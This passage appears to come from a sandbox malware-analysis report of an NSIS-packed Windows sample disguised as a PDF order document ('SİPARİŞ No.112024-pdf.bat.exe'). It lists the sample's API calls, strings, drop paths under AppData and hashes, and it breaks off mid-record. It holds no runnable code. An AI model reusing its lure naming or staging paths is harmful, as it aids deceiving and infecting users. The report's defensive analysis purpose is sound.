                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                  • API String ID: 2200240437-1946221925
                                                                  • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                  • Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
                                                                  • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                  • Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 696 403116-40312d 697 403136-40313e 696->697 698 40312f 696->698 699 403140 697->699 700 403145-40314a 697->700 698->697 699->700 701 40315a-403167 call 4032fb 700->701 702 40314c-403155 call 403311 700->702 706 4032b2 701->706 707 40316d-403171 701->707 702->701 708 4032b4-4032b5 706->708 709 403177-403197 GetTickCount call 4067bf 707->709 710 40329b-40329d 707->710 712 4032f4-4032f8 708->712 720 4032f1 709->720 722 40319d-4031a5 709->722 713 4032e6-4032ea 710->713 714 40329f-4032a2 710->714 715 4032b7-4032bd 713->715 716 4032ec 713->716 717 4032a4 714->717 718 4032a7-4032b0 call 4032fb 714->718 723 4032c2-4032d0 call 4032fb 715->723 724 4032bf 715->724 716->720 717->718 718->706 729 4032ee 718->729 720->712 726 4031a7 722->726 727 4031aa-4031b8 call 4032fb 722->727 723->706 733 4032d2-4032de call 405e2c 723->733 724->723 726->727 727->706 734 4031be-4031c7 727->734 729->720 739 4032e0-4032e3 733->739 740 403297-403299 733->740 736 4031cd-4031ea call 4067df 734->736 742 4031f0-403207 GetTickCount 736->742 743 403293-403295 736->743 739->713 740->708 744 403252-403254 742->744 745 403209-403211 742->745 743->708 746 403256-40325a 744->746 747 403287-40328b 744->747 748 403213-403217 745->748 749 403219-40324a MulDiv wsprintfW call 4052ec 745->749 750 40325c-403261 call 405e2c 746->750 751 40326f-403275 746->751 747->722 752 403291 747->752 748->744 748->749 754 40324f 749->754 757 403266-403268 750->757 756 40327b-40327f 751->756 752->720 754->744 756->736 758 403285 756->758 757->740 759 40326a-40326d 757->759 758->720 759->756
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$wsprintf
                                                                  • String ID: ... %d%%
                                                                  • API String ID: 551687249-2449383134
                                                                  • Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                  • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                                                  • Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                  • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 760 4057bb-405806 CreateDirectoryW 761 405808-40580a 760->761 762 40580c-405819 GetLastError 760->762 763 405833-405835 761->763 762->763 764 40581b-40582f SetFileSecurityW 762->764 764->761 765 405831 GetLastError 764->765 765->763
                                                                  APIs
                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                                                  • GetLastError.KERNEL32 ref: 00405812
                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                                                  • GetLastError.KERNEL32 ref: 00405831
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 3449924974-224404859
                                                                  • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                  • Instruction ID: bfe53add753044f5513d0e7cef191a671c10544bda2f5855e72e4bfb682ac43c
                                                                  • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                  • Instruction Fuzzy Hash: 14011A72D00619DADF009FA4C9447EFBBB4EF14355F00843AD945B6281DB789658CFE9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 766 405da9-405db5 767 405db6-405dea GetTickCount GetTempFileNameW 766->767 768 405df9-405dfb 767->768 769 405dec-405dee 767->769 771 405df3-405df6 768->771 769->767 770 405df0 769->770 770->771
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00405DC7
                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3), ref: 00405DE2
                                                                  Strings
                                                                  • nsa, xrefs: 00405DB6
                                                                  • "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe", xrefs: 00405DA9
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DAE, 00405DB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                  • API String ID: 1716503409-381205748
                                                                  • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                  • Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
                                                                  • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                  • Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 6FBC1B63: GlobalFree.KERNEL32(?), ref: 6FBC1DB6
                                                                    • Part of subcall function 6FBC1B63: GlobalFree.KERNEL32(?), ref: 6FBC1DBB
                                                                    • Part of subcall function 6FBC1B63: GlobalFree.KERNEL32(?), ref: 6FBC1DC0
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC1829
                                                                  • FreeLibrary.KERNEL32(?), ref: 6FBC18AF
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC18D4
                                                                    • Part of subcall function 6FBC2356: GlobalAlloc.KERNEL32(00000040,?), ref: 6FBC2387
                                                                    • Part of subcall function 6FBC2728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FBC17FA,00000000), ref: 6FBC27F8
                                                                    • Part of subcall function 6FBC15C6: lstrcpyW.KERNEL32(?,6FBC4020,00000000,6FBC15C3,?,00000000,6FBC1753,00000000), ref: 6FBC15DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                  • String ID:
                                                                  • API String ID: 1791698881-3916222277
                                                                  • Opcode ID: cef7c2a43fa771a68df89bcdfb243a7c62a758466f60e9659b88957345a796f0
                                                                  • Instruction ID: 22edcd096741470c1e1c1fb4e84c08ae4941c0f339454de7048aa3e0c512ae20
                                                                  • Opcode Fuzzy Hash: cef7c2a43fa771a68df89bcdfb243a7c62a758466f60e9659b88957345a796f0
                                                                  • Instruction Fuzzy Hash: 3541B0714043C5DADF009F34F884BCB37A8FF05315F085566E95ABA1C6DBB89185CB62
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu92B7.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsu92B7.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsu92B7.tmp,00000000,00000011,00000002), ref: 00402557
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CloseValuelstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp
                                                                  • API String ID: 2655323295-378340024
                                                                  • Opcode ID: ff438228ff69c0b1b81607afcdffde54d041ccdc3207ec43477f834cf4197262
                                                                  • Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
                                                                  • Opcode Fuzzy Hash: ff438228ff69c0b1b81607afcdffde54d041ccdc3207ec43477f834cf4197262
                                                                  • Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68
                                                                  APIs
                                                                    • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C12
                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                    • Part of subcall function 004057BB: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow,?,00000000,000000F0), ref: 0040164D
                                                                  Strings
                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow, xrefs: 00401640
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow
                                                                  • API String ID: 1892508949-2362822837
                                                                  • Opcode ID: 58aa6ed634d69523fe253ba31863865a35b3a84d19f8a0e45168ecad015ca2ca
                                                                  • Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
                                                                  • Opcode Fuzzy Hash: 58aa6ed634d69523fe253ba31863865a35b3a84d19f8a0e45168ecad015ca2ca
                                                                  • Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                  • Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
                                                                  • Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                  • Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                  • Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
                                                                  • Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                  • Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                  • Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
                                                                  • Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                  • Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                  • Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
                                                                  • Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                  • Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                  • Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
                                                                  • Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                  • Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                  • Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
                                                                  • Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                  • Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                  • Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
                                                                  • Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                  • Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                    • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                    • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll), ref: 00405359
                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                  Similarity
                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 334405425-0
                                                                  • Opcode ID: 2e81291ab1750a8fcd1384059b07b9b97ccca7af317ac7dc5ac2b78b9278ec22
                                                                  • Instruction ID: 97d29300f9396016dda5dc64ca85157dedbc1c92ed1374a350dd7f5d7f4d946c
                                                                  • Opcode Fuzzy Hash: 2e81291ab1750a8fcd1384059b07b9b97ccca7af317ac7dc5ac2b78b9278ec22
                                                                  • Instruction Fuzzy Hash: BE21AF31D00205AACF20AFA5CE4899E7A70AF04358F60413BF511B11E0DBB98981DA6E
                                                                  APIs
                                                                  • GlobalFree.KERNEL32(00814998), ref: 00401BE7
                                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Global$AllocFree
                                                                  • String ID: Call
                                                                  • API String ID: 3394109436-1824292864
                                                                  • Opcode ID: 7af67f2b39b2e1d4e89bd13aa3b917542ebe5618f9bf55d236d5d1ccadbbb379
                                                                  • Instruction ID: c71429250c0cafa7b5cd6a02bb6544c1a7146a0c31e36a2bf00ca42990a6d084
                                                                  • Opcode Fuzzy Hash: 7af67f2b39b2e1d4e89bd13aa3b917542ebe5618f9bf55d236d5d1ccadbbb379
                                                                  • Instruction Fuzzy Hash: 6E215472600141EBDB20FB94CE8595A73A4AB44318729057FF502B32D1DBB8A8919BAD
                                                                  APIs
                                                                  • CreateFileA.KERNELBASE(00000000), ref: 6FBC2B33
                                                                  • GetLastError.KERNEL32 ref: 6FBC2C3A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 1214770103-0
                                                                  • Opcode ID: 0a9687c50f4e5f0afb6106cb20eab0450c75180bb3d9e09c7515272c0c022d98
                                                                  • Instruction ID: 0dd4e73ae91f1b71eb5efddd0548ce387bb2a146c3f92ab34230a575cf37af80
                                                                  • Opcode Fuzzy Hash: 0a9687c50f4e5f0afb6106cb20eab0450c75180bb3d9e09c7515272c0c022d98
                                                                  • Instruction Fuzzy Hash: 4F519D76444784DFDF24DFA5E940B9F37B4FB09328F11646AE805CB280C734A5A2CB56
                                                                  APIs
                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsu92B7.tmp,00000000,00000011,00000002), ref: 00402557
                                                                  Similarity
                                                                  • API ID: CloseQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3356406503-0
                                                                  • Opcode ID: 78cb46a17e4604e5fda0a3152fe399088287bee99fe32485d92fc9a21df269c8
                                                                  • Instruction ID: d0975296e26d4c0b9efdbcb6ea02913ec0c3a4f45bebf2ca255a38b3541a69e3
                                                                  • Opcode Fuzzy Hash: 78cb46a17e4604e5fda0a3152fe399088287bee99fe32485d92fc9a21df269c8
                                                                  • Instruction Fuzzy Hash: CF11A731D14205EBDF14DF64CA585AE77B4EF44348F20843FE445B72D0D6B85A41EB5A
                                                                  APIs
                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                    • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C12
                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                  • lstrlenW.KERNEL32(00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405CBA
                                                                  • GetFileAttributesW.KERNELBASE(00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405CCA
                                                                  Similarity
                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                  • String ID:
                                                                  • API String ID: 3248276644-0
                                                                  • Opcode ID: 28137d2b7c79da387a19cc910a57ce3f03d1b4ac0c29095b07e0900cb30f0510
                                                                  • Instruction ID: 2026245c43f0ab98faeafd35ab7c4279b053bc85bc29d2cdff443752a8830806
                                                                  • Opcode Fuzzy Hash: 28137d2b7c79da387a19cc910a57ce3f03d1b4ac0c29095b07e0900cb30f0510
                                                                  • Instruction Fuzzy Hash: 54F0F436109F511AF62233361D09EAF1648CE82328B5A057FF952B26D1CA3C89039CBE
                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                  • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
